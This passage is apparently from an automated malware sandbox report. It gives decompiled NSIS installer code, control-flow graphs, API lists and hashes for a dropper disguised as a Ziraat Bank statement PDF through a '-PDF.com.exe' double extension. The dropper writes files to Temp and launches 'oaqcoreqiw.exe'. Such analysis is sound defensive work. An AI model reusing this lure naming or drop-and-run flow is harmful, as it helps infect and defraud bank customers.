                                                  • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: H7B
                                                  • API String ID: 2475350683-2300413410
                                                  • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                  • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                  • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                  • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 260 403d9d-403dc6 call 403fed call 40603f 251->260 256 403d92-403d98 lstrcatW 252->256 257 403d7c-403d8d call 406536 252->257 256->260 257->256 266 403e58-403e60 call 40603f 260->266 267 403dcc-403dd1 260->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 268 403dd7-403dff call 406536 267->268 268->266 277 403e01-403e05 268->277 273->274 275 403f14-403f1c call 40140b 274->275 276 403e95-403ec5 RegisterClassW 274->276 290 403f26-403f31 call 403fed 275->290 291 403f1e-403f21 275->291 279 403fe3 276->279 280 403ecb-403f0f SystemParametersInfoW CreateWindowExW 276->280 282 403e17-403e23 lstrlenW 277->282 283 403e07-403e14 call 405f64 277->283 288 403fe5-403fec 279->288 280->275 284 403e25-403e33 lstrcmpiW 282->284 285 403e4b-403e53 call 405f37 call 406668 282->285 283->282 284->285 289 403e35-403e3f GetFileAttributesW 284->289 285->266 294 403e41-403e43 289->294 295 403e45-403e46 call 405f83 289->295 301 403f37-403f51 ShowWindow call 4069c5 290->301 302 403fba-403fc2 call 40579d 290->302 291->288 294->285 294->295 295->285 309 403f53-403f58 call 4069c5 301->309 310 403f5d-403f6f GetClassInfoW 301->310 307 403fc4-403fca 302->307 308 403fdc-403fde call 40140b 302->308 307->291 311 403fd0-403fd7 call 40140b 307->311 308->279 309->310 314 403f71-403f81 GetClassInfoW RegisterClassW 310->314 315 403f87-403faa DialogBoxParamW call 40140b 310->315 311->291 314->315 318 403faf-403fb8 call 403c67 315->318 318->288
                                                  C-Code - Quality: 96%
                                                  			E00403D17(void* __eflags) {
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v8;
                                                  				int _v12;
                                                  				void _v16;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t22;
                                                  				void* _t30;
                                                  				void* _t32;
                                                  				int _t33;
                                                  				void* _t36;
                                                  				int _t39;
                                                  				int _t40;
                                                  				int _t44;
                                                  				short _t63;
                                                  				WCHAR* _t65;
                                                  				signed char _t69;
                                                  				WCHAR* _t76;
                                                  				intOrPtr _t82;
                                                  				WCHAR* _t87;
                                                  
                                                  				_t82 =  *0x42a270;
                                                  				_t22 = E00406A35(2);
                                                  				_t90 = _t22;
                                                  				if(_t22 == 0) {
                                                  					_t76 = 0x423748;
                                                  					L"1033" = 0x30;
                                                  					 *0x437002 = 0x78;
                                                  					 *0x437004 = 0;
                                                  					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                  					__eflags =  *0x423748;
                                                  					if(__eflags == 0) {
                                                  						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                  					}
                                                  					lstrcatW(L"1033", _t76);
                                                  				} else {
                                                  					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                  				}
                                                  				E00403FED(_t78, _t90);
                                                  				_t86 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
                                                  				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                  				 *0x42a2fc = 0x10000;
                                                  				if(E0040603F(_t90, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
                                                  					L16:
                                                  					if(E0040603F(_t98, _t86) == 0) {
                                                  						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                  					}
                                                  					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                  					 *0x429248 = _t30;
                                                  					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                  						L21:
                                                  						if(E0040140B(0) == 0) {
                                                  							_t32 = E00403FED(_t78, __eflags);
                                                  							__eflags =  *0x42a300;
                                                  							if( *0x42a300 != 0) {
                                                  								_t33 = E0040579D(_t32, 0);
                                                  								__eflags = _t33;
                                                  								if(_t33 == 0) {
                                                  									E0040140B(1);
                                                  									goto L33;
                                                  								}
                                                  								__eflags =  *0x42922c;
                                                  								if( *0x42922c == 0) {
                                                  									E0040140B(2);
                                                  								}
                                                  								goto L22;
                                                  							}
                                                  							ShowWindow( *0x423728, 5); // executed
                                                  							_t39 = E004069C5("RichEd20"); // executed
                                                  							__eflags = _t39;
                                                  							if(_t39 == 0) {
                                                  								E004069C5("RichEd32");
                                                  							}
                                                  							_t87 = L"RichEdit20W";
                                                  							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                  							__eflags = _t40;
                                                  							if(_t40 == 0) {
                                                  								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                  								 *0x429224 = _t87;
                                                  								RegisterClassW(0x429200);
                                                  							}
                                                  							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                  							E00403C67(E0040140B(5), 1);
                                                  							return _t44;
                                                  						}
                                                  						L22:
                                                  						_t36 = 2;
                                                  						return _t36;
                                                  					} else {
                                                  						_t78 =  *0x42a260;
                                                  						 *0x429204 = E00401000;
                                                  						 *0x429210 =  *0x42a260;
                                                  						 *0x429214 = _t30;
                                                  						 *0x429224 = 0x40a3b4;
                                                  						if(RegisterClassW(0x429200) == 0) {
                                                  							L33:
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                  						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                  						goto L21;
                                                  					}
                                                  				} else {
                                                  					_t78 =  *(_t82 + 0x48);
                                                  					_t92 = _t78;
                                                  					if(_t78 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					_t76 = 0x428200;
                                                  					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                  					_t63 =  *0x428200; // 0x22
                                                  					if(_t63 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					if(_t63 == 0x22) {
                                                  						_t76 = 0x428202;
                                                  						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                  					}
                                                  					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                  					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                  						L15:
                                                  						E00406668(_t86, E00405F37(_t76));
                                                  						goto L16;
                                                  					} else {
                                                  						_t69 = GetFileAttributesW(_t76);
                                                  						if(_t69 == 0xffffffff) {
                                                  							L14:
                                                  							E00405F83(_t76);
                                                  							goto L15;
                                                  						}
                                                  						_t98 = _t69 & 0x00000010;
                                                  						if((_t69 & 0x00000010) != 0) {
                                                  							goto L15;
                                                  						}
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  			}

























                                                  APIs
                                                    • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                    • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                  • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                  • lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,?,?,?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,772EFAA0), ref: 00403E18
                                                  • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,?,?,?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                  • GetFileAttributesW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,?,00000000,?), ref: 00403E36
                                                  • LoadImageW.USER32 ref: 00403E7F
                                                    • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                  • RegisterClassW.USER32 ref: 00403EBC
                                                  • SystemParametersInfoW.USER32 ref: 00403ED4
                                                  • CreateWindowExW.USER32 ref: 00403F09
                                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                  • GetClassInfoW.USER32 ref: 00403F6B
                                                  • GetClassInfoW.USER32 ref: 00403F78
                                                  • RegisterClassW.USER32 ref: 00403F81
                                                  • DialogBoxParamW.USER32 ref: 00403FA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-3834852686
                                                  • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                  • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                  • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                  • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 342 403322-403327 334->342 343 403257-40325a 334->343 337 403163-40317a 335->337 338 40317c 337->338 339 40317e-403187 call 4035e2 337->339 338->339 348 40318d-403194 339->348 349 4032de-4032e6 call 40302e 339->349 342->327 345 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 343->345 346 40325c-403274 call 4035f8 call 4035e2 343->346 373 4032d4-4032d9 345->373 374 4032e8-403318 call 4035f8 call 403371 345->374 346->342 368 40327a-403280 346->368 352 403210-403214 348->352 353 403196-4031aa call 406113 348->353 349->342 357 403216-40321d call 40302e 352->357 358 40321e-403224 352->358 353->358 371 4031ac-4031b3 353->371 357->358 364 403233-40323b 358->364 365 403226-403230 call 406b22 358->365 364->337 372 403241 364->372 365->364 368->342 368->345 371->358 376 4031b5-4031bc 371->376 372->334 373->327 382 40331d-403320 374->382 376->358 379 4031be-4031c5 376->379 379->358 381 4031c7-4031ce 379->381 381->358 383 4031d0-4031f0 381->383 382->342 384 403329-40333a 382->384 383->342 385 4031f6-4031fa 383->385 386 403342-403347 384->386 387 40333c 384->387 388 403202-40320a 385->388 389 4031fc-403200 385->389 391 403348-40334e 386->391 387->386 388->358 390 40320c-40320e 388->390 389->372 389->388 390->358 391->391 392 403350-403368 call 406113 391->392 392->327
                                                  C-Code - Quality: 98%
                                                  			E004030D0(void* __eflags, signed int _a4) {
                                                  				DWORD* _v8;
                                                  				DWORD* _v12;
                                                  				intOrPtr _v16;
                                                  				long _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				signed int _v40;
                                                  				short _v560;
                                                  				long _t54;
                                                  				void* _t57;
                                                  				void* _t62;
                                                  				intOrPtr _t65;
                                                  				void* _t68;
                                                  				intOrPtr* _t70;
                                                  				long _t82;
                                                  				signed int _t89;
                                                  				intOrPtr _t92;
                                                  				long _t94;
                                                  				void* _t102;
                                                  				void* _t106;
                                                  				long _t107;
                                                  				long _t110;
                                                  				void* _t111;
                                                  
                                                  				_t94 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				 *0x42a26c = GetTickCount() + 0x3e8;
                                                  				GetModuleFileNameW(0, L"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x400);
                                                  				_t106 = E00406158(L"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x80000000, 3);
                                                  				 *0x40a018 = _t106;
                                                  				if(_t106 == 0xffffffff) {
                                                  					return L"Error launching installer";
                                                  				}
                                                  				E00406668(L"C:\\Users\\frontdesk\\Desktop", L"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe");
                                                  				E00406668(0x439000, E00405F83(L"C:\\Users\\frontdesk\\Desktop"));
                                                  				_t54 = GetFileSize(_t106, 0);
                                                  				 *0x420f00 = _t54;
                                                  				_t110 = _t54;
                                                  				if(_t54 <= 0) {
                                                  					L24:
                                                  					E0040302E(1);
                                                  					if( *0x42a274 == _t94) {
                                                  						goto L32;
                                                  					}
                                                  					if(_v12 == _t94) {
                                                  						L28:
                                                  						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                  						_t111 = _t57;
                                                  						E00406B90(0x40ce68);
                                                  						E00406187(0x40ce68,  &_v560, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\"); // executed
                                                  						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                  						 *0x40a01c = _t62;
                                                  						if(_t62 != 0xffffffff) {
                                                  							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                  							 *0x420f04 = _t65;
                                                  							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                  							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                  							if(_t68 == _v20) {
                                                  								 *0x42a270 = _t111;
                                                  								 *0x42a278 =  *_t111;
                                                  								if((_v40 & 0x00000001) != 0) {
                                                  									 *0x42a27c =  *0x42a27c + 1;
                                                  								}
                                                  								_t45 = _t111 + 0x44; // 0x44
                                                  								_t70 = _t45;
                                                  								_t102 = 8;
                                                  								do {
                                                  									_t70 = _t70 - 8;
                                                  									 *_t70 =  *_t70 + _t111;
                                                  									_t102 = _t102 - 1;
                                                  								} while (_t102 != 0);
                                                  								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                                  								E00406113(0x42a280, _t111 + 4, 0x40);
                                                  								return 0;
                                                  							}
                                                  							goto L32;
                                                  						}
                                                  						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                  					}
                                                  					E004035F8( *0x420ef0);
                                                  					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                                  						goto L32;
                                                  					} else {
                                                  						goto L28;
                                                  					}
                                                  				} else {
                                                  					do {
                                                  						_t107 = _t110;
                                                  						asm("sbb eax, eax");
                                                  						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                  						if(_t110 >= _t82) {
                                                  							_t107 = _t82;
                                                  						}
                                                  						if(E004035E2(0x418ef0, _t107) == 0) {
                                                  							E0040302E(1);
                                                  							L32:
                                                  							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                  						}
                                                  						if( *0x42a274 != 0) {
                                                  							if((_a4 & 0x00000002) == 0) {
                                                  								E0040302E(0);
                                                  							}
                                                  							goto L20;
                                                  						}
                                                  						E00406113( &_v40, 0x418ef0, 0x1c);
                                                  						_t89 = _v40;
                                                  						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                  							_a4 = _a4 | _t89;
                                                  							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                  							_t92 = _v16;
                                                  							 *0x42a274 =  *0x420ef0;
                                                  							if(_t92 > _t110) {
                                                  								goto L32;
                                                  							}
                                                  							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                  								_v12 = _v12 + 1;
                                                  								_t110 = _t92 - 4;
                                                  								if(_t107 > _t110) {
                                                  									_t107 = _t110;
                                                  								}
                                                  								goto L20;
                                                  							} else {
                                                  								break;
                                                  							}
                                                  						}
                                                  						L20:
                                                  						if(_t110 <  *0x420f00) {
                                                  							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                  						}
                                                  						 *0x420ef0 =  *0x420ef0 + _t107;
                                                  						_t110 = _t110 - _t107;
                                                  					} while (_t110 != 0);
                                                  					_t94 = 0;
                                                  					goto L24;
                                                  				}
                                                  			}





























                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004030E4
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,00000400), ref: 00403100
                                                    • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                    • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00403149
                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-2584121061
                                                  • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                  • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                  • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                  • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 77%
                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                  				void* __esi;
                                                  				void* _t35;
                                                  				void* _t43;
                                                  				void* _t45;
                                                  				FILETIME* _t51;
                                                  				FILETIME* _t64;
                                                  				void* _t66;
                                                  				signed int _t72;
                                                  				FILETIME* _t73;
                                                  				FILETIME* _t77;
                                                  				signed int _t79;
                                                  				WCHAR* _t81;
                                                  				void* _t83;
                                                  				void* _t84;
                                                  				void* _t86;
                                                  
                                                  				_t77 = __ebx;
                                                  				 *(_t86 - 8) = E00402DA6(0x31);
                                                  				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                  				_t35 = E00405FAE( *(_t86 - 8));
                                                  				_push( *(_t86 - 8));
                                                  				_t81 = L"\"C:\\";
                                                  				if(_t35 == 0) {
                                                  					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
                                                  				} else {
                                                  					E00406668();
                                                  				}
                                                  				E004068EF(_t81);
                                                  				while(1) {
                                                  					__eflags =  *(_t86 + 8) - 3;
                                                  					if( *(_t86 + 8) >= 3) {
                                                  						_t66 = E0040699E(_t81);
                                                  						_t79 = 0;
                                                  						__eflags = _t66 - _t77;
                                                  						if(_t66 != _t77) {
                                                  							_t73 = _t66 + 0x14;
                                                  							__eflags = _t73;
                                                  							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                  						}
                                                  						asm("sbb eax, eax");
                                                  						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                  						__eflags = _t72;
                                                  						 *(_t86 + 8) = _t72;
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                  					if( *(_t86 + 8) == _t77) {
                                                  						E00406133(_t81);
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - 1;
                                                  					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                  					__eflags = _t43 - 0xffffffff;
                                                  					 *(_t86 - 0x38) = _t43;
                                                  					if(_t43 != 0xffffffff) {
                                                  						break;
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                  					if( *(_t86 + 8) != _t77) {
                                                  						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                  						__eflags =  *(_t86 + 8) - 2;
                                                  						if(__eflags == 0) {
                                                  							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                  						}
                                                  						L31:
                                                  						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                  						__eflags =  *0x42a2e8;
                                                  						goto L32;
                                                  					} else {
                                                  						E00406668(0x40b5f8, _t83);
                                                  						E00406668(_t83, _t81);
                                                  						E004066A5(_t77, _t81, _t83, "C:\Users\FRONTD~1\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                  						E00406668(_t83, 0x40b5f8);
                                                  						_t64 = E00405CC8("C:\Users\FRONTD~1\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                  						__eflags = _t64;
                                                  						if(_t64 == 0) {
                                                  							continue;
                                                  						} else {
                                                  							__eflags = _t64 == 1;
                                                  							if(_t64 == 1) {
                                                  								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                  								L32:
                                                  								_t51 = 0;
                                                  								__eflags = 0;
                                                  							} else {
                                                  								_push(_t81);
                                                  								_push(0xfffffffa);
                                                  								E004056CA();
                                                  								L29:
                                                  								_t51 = 0x7fffffff;
                                                  							}
                                                  						}
                                                  					}
                                                  					L33:
                                                  					return _t51;
                                                  				}
                                                  				E004056CA(0xffffffea,  *(_t86 - 8));
                                                  				 *0x42a314 =  *0x42a314 + 1;
                                                  				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                  				 *0x42a314 =  *0x42a314 - 1;
                                                  				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                  				_t84 = _t45;
                                                  				if( *(_t86 - 0x24) != 0xffffffff) {
                                                  					L22:
                                                  					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                  				} else {
                                                  					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                  					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                  						goto L22;
                                                  					}
                                                  				}
                                                  				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                  				__eflags = _t84 - _t77;
                                                  				if(_t84 >= _t77) {
                                                  					goto L31;
                                                  				} else {
                                                  					__eflags = _t84 - 0xfffffffe;
                                                  					if(_t84 != 0xfffffffe) {
                                                  						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                  					} else {
                                                  						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                  						lstrcatW(_t81,  *(_t86 - 8));
                                                  					}
                                                  					_push(0x200010);
                                                  					_push(_t81);
                                                  					E00405CC8();
                                                  					goto L29;
                                                  				}
                                                  				goto L33;
                                                  			}



















                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,C:\Users\user~1\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
